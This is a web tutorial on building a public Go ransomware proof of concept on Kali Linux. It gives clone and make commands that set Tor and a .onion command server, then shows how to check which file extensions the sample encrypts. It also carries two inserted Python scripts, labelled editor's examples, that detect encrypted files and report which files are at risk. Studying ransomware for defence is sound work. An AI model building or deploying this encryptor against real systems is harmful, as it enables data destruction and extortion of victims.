How to Create a Ransomware Using Kali Linux?

Ransomware: Build Your Own Ransomware


Ransomware is quickly becoming the most serious form of malware affecting our digital systems. Many families are attacking companies around the world, including the new Snake ransomware, which is specifically designed for SCADA/ICS systems and therefore threatens national infrastructure and industrial control systems. Colonial Pipeline in the US paid a $5 million ransom, and CNA, a major US insurance company, recently admitted that it had paid $40 million in ransom! Ransomware is becoming more sophisticated and more malicious.

Let's build our own ransomware from a Proof of Concept (POC) published by mauri870 on github.com. He created this ransomware as part of an academic program; it is not malicious in nature but is meant to help us understand how ransomware works. Like the Snake variant and many other malware strains, it is written in Go.

This malware encrypts files in the background using AES-256-CTR and uses RSA-4096 for the data exchange with its server. In that design it closely resembles CryptoLocker, one of the best-known ransomware families ever.
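Because AES-CTR output is indistinguishable from random bytes, a file that was readable plaintext and is suddenly near-maximal entropy (close to 8 bits per byte) is a strong signal that an encryptor like this one has run. The following Python triage script, added here as an editor's example and not part of the original article or the mauri870 project, computes Shannon entropy over a constructed set of sample files and flags the ones that look encrypted. The threshold, the minimum file size and the list of compressed-format headers are assumptions; compressed formats such as JPEG or ZIP are also high-entropy, so recognising their magic bytes keeps false positives down.

```python
"""Entropy-based triage for files that may have been encrypted in bulk.

Editor's example, not code from the article or the mauri870 repository.
"""
import hashlib
import math
from collections import Counter

# Magic numbers of formats that are legitimately high-entropy.
# Assumption: a small illustrative list; extend it for your environment.
COMPRESSED_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip/office",
    b"\x1f\x8b": "gzip",
    b"%PDF": "pdf",  # PDFs usually contain deflated streams
}

ENTROPY_THRESHOLD = 7.5   # bits per byte; assumed cut-off
MIN_SIZE = 64             # entropy of tiny files is not meaningful


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def known_compressed(data: bytes):
    """Return the format name if data starts with a known compressed-format header."""
    for magic, name in COMPRESSED_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def looks_encrypted(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """Flag data that is high-entropy and not a recognised compressed format."""
    if len(data) < MIN_SIZE:
        return False
    if known_compressed(data):
        return False
    return shannon_entropy(data) >= threshold


def triage(files: dict) -> list:
    """Return the sorted names of files (name -> bytes) that look encrypted."""
    return sorted(name for name, data in files.items() if looks_encrypted(data))


def _pseudo_random(n_blocks: int) -> bytes:
    """Deterministic high-entropy bytes standing in for ciphertext (constructed)."""
    return b"".join(hashlib.sha256(bytes([i])).digest() for i in range(n_blocks))


# Constructed sample "disk": a memo, a JPEG-like image, two encrypted files
# and a file too small to judge.
SAMPLE_FILES = {
    "memo.txt": b"Quarterly report: revenue up, costs flat. Please review.\n" * 40,
    "photo.jpg": b"\xff\xd8\xff" + _pseudo_random(64),
    "memo.txt.encrypted": _pseudo_random(128),
    "notes.docx.encrypted": _pseudo_random(32),
    "tiny.cfg": b"x=1\n",
}

if __name__ == "__main__":
    for name, data in SAMPLE_FILES.items():
        print(f"{name:22s} entropy={shannon_entropy(data):.2f} "
              f"flagged={looks_encrypted(data)}")
    print("flagged:", triage(SAMPLE_FILES))
```

In a real deployment you would run `looks_encrypted` only over files modified in the last few minutes and alert when the flagged count per host rises sharply, since a single high-entropy file is normal but hundreds appearing at once is not.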

Step 1: Download and Install the Binaries

First, fire up Kali and make sure that Go (golang) is installed. You can install it from the Kali repositories by entering:

kali > sudo apt install golang

Next, as the root user, create a directory named git.

kali > mkdir git

Next, change directory (cd), to this directory.

kali > cd git

Next, clone the project from GitHub:

kali > git clone https://github.com/mauri870/ransomware

Step 2: Export the Go Environment Variables

Next, we need to define the Go environment variables that point the toolchain and its binaries to the correct directories.

Step 3: Fetch the Source Code Dependencies

Once the variables have been exported, it is time to fetch the dependencies. Navigate into the ransomware directory and type make deps.

kali > cd ransomware

kali > make deps

Step 4: Build the Binaries Using Options

With the dependencies in place, we can build the binaries. We will pass a few build options in our case.

The first option is Tor. This sends all communication with the server over the Tor network.

USE_TOR=true

Second, we point it at our dark-web server at hackersarisegtdj.onion (you can use any domain, or localhost).

SERVER_HOST=hackersarisegtdj.onion

We want to use port 80 (you can use any port).

SERVER_PORT=80

Finally, we set the target operating system for the build, in this instance Linux.

GOOS=linux

Putting it all together, the build command is:

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Hit ENTER to watch your ransomware build.


Step 5: Check the ransomware Directory

After the build completes, do a long listing of the ransomware directory.

kali > ls

Then navigate to the bin directory.

kali > cd bin

There you will find ransomware.exe and the server binary.

Step 6: Examine the Types of Files To Be Encrypted

Navigate to the cmd directory and open common.go.

kali > cd cmd

kali > more common.go

This file lists the file extensions this ransomware will encrypt when it is executed.
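Reading that extension list by eye is fine for one sample, but an analyst usually wants to pull it out programmatically and map it against the files an organisation actually holds, to know what would be at risk. The Python script below is an editor's example, not code from the article or from the mauri870 repository: the Go snippet it parses is a constructed stand-in that only imitates the shape of such a list (the real common.go contents are not reproduced here), and the file inventory is likewise constructed. The regular expressions, function names and the `[]string{...}` block assumption are the editor's.

```python
"""Static triage: extract the target-extension list from a Go source file
and check which inventoried files it would match.

Editor's example; the Go source below is constructed, not the real common.go.
"""
import re
from pathlib import PurePosixPath

# Constructed stand-in for the contents of cmd/common.go (not the real file).
SAMPLE_GO_SOURCE = '''
package cmd

// Extensions that the encryptor walks the filesystem looking for.
var Extensions = []string{
    ".doc", ".docx", ".xls", ".xlsx",
    ".pdf", ".jpg", ".png",
    ".sql", ".bak",
}

// Unrelated string literals the extractor must ignore.
const serverURL = "http://example.onion/api"
const encSuffix = ".encrypted"
'''

# A string literal that is exactly a dotted extension, e.g. ".docx".
_EXT_LITERAL = re.compile(r'"(\.[A-Za-z0-9]{1,10})"')


def extract_extensions(go_source: str) -> list:
    """Return the distinct, lower-cased extension literals in a Go source string.

    Only the first []string{...} block is searched (assumption about the
    file's shape), so unrelated literals such as URLs or the suffix that is
    appended to encrypted files are not picked up.
    """
    m = re.search(r'\[\]string\s*\{(.*?)\}', go_source, re.S)
    block = m.group(1) if m else ""
    seen = []
    for ext in _EXT_LITERAL.findall(block):
        ext = ext.lower()
        if ext not in seen:
            seen.append(ext)
    return seen


def would_be_targeted(path: str, extensions) -> bool:
    """True if the file's extension (case-insensitive) is on the target list."""
    suffix = PurePosixPath(path).suffix.lower()
    return bool(suffix) and suffix in set(extensions)


def exposure_report(paths, extensions) -> dict:
    """Map each target extension to the number of matching files in paths."""
    counts = {ext: 0 for ext in extensions}
    for p in paths:
        suffix = PurePosixPath(p).suffix.lower()
        if suffix in counts:
            counts[suffix] += 1
    return counts


# Constructed file inventory, e.g. from a backup catalogue or a find(1) run.
SAMPLE_INVENTORY = [
    "/srv/share/finance/q3.xlsx",
    "/srv/share/finance/Q2.XLSX",
    "/srv/share/hr/handbook.pdf",
    "/srv/share/it/dump.sql",
    "/srv/share/it/server.log",
    "/home/alice/photo.JPG",
    "/home/alice/README",
]

if __name__ == "__main__":
    exts = extract_extensions(SAMPLE_GO_SOURCE)
    print("target extensions:", exts)
    for path in SAMPLE_INVENTORY:
        status = "AT RISK" if would_be_targeted(path, exts) else "ok     "
        print(f"{status}  {path}")
    print(exposure_report(SAMPLE_INVENTORY, exts))
```

The report tells a defender where the encryptor would bite hardest (here the finance share's spreadsheets), which is the information needed to prioritise backups and restrict write access before testing the sample in an isolated VM.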

Summary

Ransomware is the most serious threat to our digital systems right now. The Colonial Pipeline attack has clearly shown that almost everyone is at risk. If SCADA/ICS systems are compromised, there could be serious economic and infrastructure ramifications.

This ransomware POC will help you understand ransomware better and test your own systems to determine whether they are susceptible.

In the second part of this series, we will test this ransomware on a Windows VM.